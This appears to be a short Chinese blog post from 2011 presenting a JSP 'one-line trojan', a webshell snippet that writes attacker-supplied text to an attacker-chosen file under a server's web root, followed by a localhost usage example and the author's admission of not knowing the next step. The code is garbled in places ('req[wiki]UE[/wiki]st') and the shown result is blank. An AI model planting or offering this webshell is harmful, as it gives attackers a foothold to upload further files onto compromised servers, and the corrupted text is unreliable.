JSP一句话木马

JSP一句话木马 

2011-01-13 21:39:42|  分类: 网络技巧 |  标签:jsp  木马  |字号 订阅

1》jsp页面代码

<%
if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("&#92;&#92;")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

2》访问示例

在浏览器地址栏输入http://127.0.0.1:8080/test/shell.jsp?f=1.txt&t=hello

然后再输入http://127.0.0.1:8080/test/1.txt

结果为

3》思考

这个接下来又能做些什么呢?我现在还不清楚,网上资料也没有进一步讲解的,如果那个高手知道,还请赐教。

 

你可能感兴趣的:(javascript)